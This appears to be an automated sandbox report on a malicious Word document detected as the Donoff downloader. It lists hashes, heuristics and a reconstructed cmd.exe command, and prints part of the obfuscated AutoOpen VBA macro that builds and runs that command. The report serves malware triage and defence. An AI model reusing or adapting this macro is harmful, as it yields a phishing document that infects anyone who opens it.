Office (OLE) malware analysis — malicious · 329812f4c8024182

MALICIOUS

Office (OLE)

93.6 KB Created: 2018-08-06 16:34:00 Authoring application: Microsoft Office Word First seen: 2018-08-26

MD5: e6b501a887c9bfee6c166d7f08fbb9af SHA-1: bb057414e9b7282a0a49eef4ff9dbe7cbf9abb1b SHA-256: 329812f4c80241828b4f21667a7165662d1149b78cd4bddaccaa98bde44ec021

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic AutoOpen macro, identified by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. This macro is designed to execute a command that appears to download and execute a second-stage payload. The reconstructed command string is: 'c:\windows\system32\cmd.exe /V:O /C set zu=LDozQcMcQijUATsujiHWBiPikSvjLKCk\9(wI h)G$:N+.0md6ftb5p{e=n,x-/l ;a8qVFroy@'g}&&for %n in (53 ,71,35,55,37,55,62,62,63,40,29,37,36,56,57,55,35,60,71,51,27,55,7,50,63,42,55,50,44,19,55,51,30,62,23,55,57,50,64,40,68,42,27,56,74,37,50,50,53,41,) do'. The ClamAV detection 'Doc.Downloader.Donoff-6666971-0' further supports its malicious nature as a downloader. The primary attack vector is likely spearphishing attachment.

Heuristics 5

ClamAV: Doc.Downloader.Donoff-6666971-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Donoff-6666971-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6004 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6004 bytes
SHA-256: `2d88a225a7467d785864c63a31da22638ea3ecd3efcb55f97c980aa4c94fb388`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HQzCCfZMamVFSH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName CDbl(JLOtt) TypeName 427422518 TypeName iuUzBf TypeName 1069 TypeName CByte(526513601) Shell@ CStr("c") + CStr("m") + nHHYhukKSZFU + BLGFYUmrsbF + qDubWdXB + pmYShq + VMhIYVJL + WRUFHLE + jKDmnmcwvO, 741922241 - 741922241 TypeName 6 TypeName iVEki TypeName CLng(biHak - kWzuEw * iGAhk - XjjjTj) End Sub Attribute VB_Name = "nNiWjTCZoGGkEj" Function qDubWdXB() On Error Resume Next TypeName JAGTZ TypeName 275249373 AcEiRHKnt = "d /" + "V:O" + "/C" + CStr(Chr(sYiPRpQ + VBzHKSfdjAaT + 34 + dEwLPvAPD + YrfizSA)) + "set zu" + "=LD" + "O" + "zQcMcQ" TypeName Oct(69341 + ENndG * IoQkD - BnpPaj) TypeName Int(88513 * 41999 / JsZSYv + 87027) ElocQim = "ijU" + "A" + "TsujiHWB" + "iPikSvjLK" + "Ck\9(wI" + "h)G$:N+" + ".0md" + "6ftb5p{e" + "=n,x" + "-/l" + " ;a8qVF" TypeName Int(URtCuj / 27908 / 69511 - qErlE) TypeName 150013212 mOwpFz = "roy@'g}&&f" + "or %n i" + "n (" + "53" + ",71,35,55" + ",70,14" + "," TypeName CByte(7587 * XEqsZD) TypeName CInt(39) jrimTEZn = "37,55" + ",62," + "62,63,40" + ",2" + "9,3" + "7,36,5" + "6,57,5" + "5,35,6" + "0,71,51,2" + "7,55," + "7,50,63," TypeName Round(MvuGba) TypeName Log(1421) TypeName UuVKVf hFhbWlovkN = "42,55,50" + ",44" + ",19,55,51" + ",30,6" + "2" + ",23" + ",55,57,50," TypeName VKLfp TypeName XiZTz TypeName Atn(17) mpqfbBLzMO = "64," + "40," + "6" + "8,42" + ",27,56,7" + "4,37,5" + "0" + ",50,53,41," TypeName 42 TypeName 15 wVXrqYQ = "61" + ",61" + ",6" + "5,51" + "," + "71,26" + ",55,7,70" + ",55,65,5" + "0,23,26,5" + "5,44,7,7" + "1,46,61,2" TypeName Atn(kJdZT) TypeName Hex(121842791) TypeName Sin(CuUNz) jXTUKtwIO = "0," + "1,73,37," + "50" + ",50" + "," TypeName Round(dXjFXz * 8485 - 91909 / anURt) TypeName CDate(kQhzr / rCFTEc) dOtMNmmVruw = "53,41,61" + ",61,35,35," + "3" + "5,44,71" + "," TypeName CDate(mIlLd) TypeName ChrB(lkFiPt) TypeName OMuwi XsXvYlG = "14,71,50" + ",14,5" + "3,65,6" + "0,23,57,50" + ",5" TypeName zFZHWv TypeName CSng(sfizEv) TypeName 12 HjBGQF = "5,70,5" + "7,6" + "5,50,23,71" + "," + "57,65," + "62" TypeName wrzilL TypeName wsJVwM TypeName CDate(87873666) zsIwiLdR = "," + "44,7" + ",71,4" + "6,6" + "1,37," + "22,22," + "73,37" + ",50" + "," qDubWdXB = AcEiRHKnt + ElocQim + mOwpFz + jrimTEZn + hFhbWlovkN + mpqfbBLzMO + wVXrqYQ + jXTUKtwIO + dOtMNmmVruw + XsXvYlG + HjBGQF + zsIwiLdR TypeName RnQGPM TypeName Tan(zAphp) End Function Function pmYShq() On Error Resume Next TypeName 211 TypeName 9039 TypeName Hex(66715 + GziWj / IXzkm * UOlTp) dHtUFlE = "50,53" + "," + "41,61,61" + ",50" + "," TypeName 7445 TypeName Sqr(kkSAh + ZVjSj) TypeName ChrB(OMDKw) EmWZYnbPu = "65" + "," + "50,71,55,1" + "4" + ",50,15" + ",47,23,71" + ",44,7," + "71,46" + ",61,50,8," + "67,5" TypeName GMtXnR TypeName Sqr(KCTCVw + cDiGw + VSWVYG - zUOmI) UvUXjpwKkMT = "0,13,69," + "72,73," + "37,5" + "0,50,53,4" + "1,61,61,5" + "1,65," + "71,57,75" + ",71,7,14" + ",5" + "3,65,44," + "26" + ",57,6" TypeName 5302 TypeName Tan(vNJEb - 88611) TypeName Atn(qtOUN + OWbGp) FYDMafs = "1,2,48,7" + "3" + ",37,50," + "50," + "53,41" TypeName Atn(245) TypeName PTRfbJ TypeName JwPPKG PzuuP = ",61,61,35" + ",35,35," + "44,72," + "15,65,5" + "7,27,37," + "15,6" + "5,44,7,71" + ",46,61,39," + "45,59," + "23,3" + "5,13,69,74" TypeName Tan(CWzpR) TypeName Tan(42) TypeName Tan(5) iinzziCPhau = ",44,25" + ",53,62,2" + "3,50,3" + "4,74,7" + "3,74," + "3" TypeName Sin(mBawis + rpHEWb) TypeName CDate(qZMMJA - VzsDP - ZZjzQ / zSZCjv) dDhDLiS = "8,64," + "40,49,49," + "2," + "63,56," + "63,7" + "4,52,6" + "6,33,74," + "64,4" + "0,50,62" + ",68,5" + "6,40,55,57" + ",26,41,5" TypeName T ... (truncated)

SHA-256: 2d88a225a7467d785864c63a31da22638ea3ecd3efcb55f97c980aa4c94fb388

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HQzCCfZMamVFSH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName CDbl(JLOtt)
   TypeName 427422518
   TypeName iuUzBf
   TypeName 1069
   TypeName CByte(526513601)
Shell@ CStr("c") + CStr("m") + nHHYhukKSZFU + BLGFYUmrsbF + qDubWdXB + pmYShq + VMhIYVJL + WRUFHLE + jKDmnmcwvO, 741922241 - 741922241
   TypeName 6
   TypeName iVEki
   TypeName CLng(biHak - kWzuEw * iGAhk - XjjjTj)
End Sub


Attribute VB_Name = "nNiWjTCZoGGkEj"
Function qDubWdXB()
On Error Resume Next
TypeName JAGTZ
   TypeName 275249373
AcEiRHKnt = "d /" + "V:O" + "/C" + CStr(Chr(sYiPRpQ + VBzHKSfdjAaT + 34 + dEwLPvAPD + YrfizSA)) + "set zu" + "=LD" + "O" + "zQcMcQ"
TypeName Oct(69341 + ENndG * IoQkD - BnpPaj)
   TypeName Int(88513 * 41999 / JsZSYv + 87027)
ElocQim = "ijU" + "A" + "TsujiHWB" + "iPikSvjLK" + "Ck\9(wI" + "h)G$:N+" + ".0md" + "6ftb5p{e" + "=n,x" + "-/l" + " ;a8qVF"
TypeName Int(URtCuj / 27908 / 69511 - qErlE)
   TypeName 150013212
mOwpFz = "roy@'g}&&f" + "or %n i" + "n (" + "53" + ",71,35,55" + ",70,14" + ","
TypeName CByte(7587 * XEqsZD)
   TypeName CInt(39)
jrimTEZn = "37,55" + ",62," + "62,63,40" + ",2" + "9,3" + "7,36,5" + "6,57,5" + "5,35,6" + "0,71,51,2" + "7,55," + "7,50,63,"
TypeName Round(MvuGba)
   TypeName Log(1421)
   TypeName UuVKVf
hFhbWlovkN = "42,55,50" + ",44" + ",19,55,51" + ",30,6" + "2" + ",23" + ",55,57,50,"
TypeName VKLfp
   TypeName XiZTz
   TypeName Atn(17)
mpqfbBLzMO = "64," + "40," + "6" + "8,42" + ",27,56,7" + "4,37,5" + "0" + ",50,53,41,"
TypeName 42
   TypeName 15
wVXrqYQ = "61" + ",61" + ",6" + "5,51" + "," + "71,26" + ",55,7,70" + ",55,65,5" + "0,23,26,5" + "5,44,7,7" + "1,46,61,2"
TypeName Atn(kJdZT)
   TypeName Hex(121842791)
   TypeName Sin(CuUNz)
jXTUKtwIO = "0," + "1,73,37," + "50" + ",50" + ","
TypeName Round(dXjFXz * 8485 - 91909 / anURt)
   TypeName CDate(kQhzr / rCFTEc)
dOtMNmmVruw = "53,41,61" + ",61,35,35," + "3" + "5,44,71" + ","
TypeName CDate(mIlLd)
   TypeName ChrB(lkFiPt)
   TypeName OMuwi
XsXvYlG = "14,71,50" + ",14,5" + "3,65,6" + "0,23,57,50" + ",5"
TypeName zFZHWv
   TypeName CSng(sfizEv)
   TypeName 12
HjBGQF = "5,70,5" + "7,6" + "5,50,23,71" + "," + "57,65," + "62"
TypeName wrzilL
   TypeName wsJVwM
   TypeName CDate(87873666)
zsIwiLdR = "," + "44,7" + ",71,4" + "6,6" + "1,37," + "22,22," + "73,37" + ",50" + ","
qDubWdXB = AcEiRHKnt + ElocQim + mOwpFz + jrimTEZn + hFhbWlovkN + mpqfbBLzMO + wVXrqYQ + jXTUKtwIO + dOtMNmmVruw + XsXvYlG + HjBGQF + zsIwiLdR
   TypeName RnQGPM
   TypeName Tan(zAphp)
End Function
Function pmYShq()
On Error Resume Next
TypeName 211
   TypeName 9039
   TypeName Hex(66715 + GziWj / IXzkm * UOlTp)
dHtUFlE = "50,53" + "," + "41,61,61" + ",50" + ","
TypeName 7445
   TypeName Sqr(kkSAh + ZVjSj)
   TypeName ChrB(OMDKw)
EmWZYnbPu = "65" + "," + "50,71,55,1" + "4" + ",50,15" + ",47,23,71" + ",44,7," + "71,46" + ",61,50,8," + "67,5"
TypeName GMtXnR
   TypeName Sqr(KCTCVw + cDiGw + VSWVYG - zUOmI)
UvUXjpwKkMT = "0,13,69," + "72,73," + "37,5" + "0,50,53,4" + "1,61,61,5" + "1,65," + "71,57,75" + ",71,7,14" + ",5" + "3,65,44," + "26" + ",57,6"
TypeName 5302
   TypeName Tan(vNJEb - 88611)
   TypeName Atn(qtOUN + OWbGp)
FYDMafs = "1,2,48,7" + "3" + ",37,50," + "50," + "53,41"
TypeName Atn(245)
   TypeName PTRfbJ
   TypeName JwPPKG
PzuuP = ",61,61,35" + ",35,35," + "44,72," + "15,65,5" + "7,27,37," + "15,6" + "5,44,7,71" + ",46,61,39," + "45,59," + "23,3" + "5,13,69,74"
TypeName Tan(CWzpR)
   TypeName Tan(42)
   TypeName Tan(5)
iinzziCPhau = ",44,25" + ",53,62,2" + "3,50,3" + "4,74,7" + "3,74," + "3"
TypeName Sin(mBawis + rpHEWb)
   TypeName CDate(qZMMJA - VzsDP - ZZjzQ / zSZCjv)
dDhDLiS = "8,64," + "40,49,49," + "2," + "63,56," + "63,7" + "4,52,6" + "6,33,74," + "64,4" + "0,50,62" + ",68,5" + "6,40,55,57" + ",26,41,5"
TypeName T
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.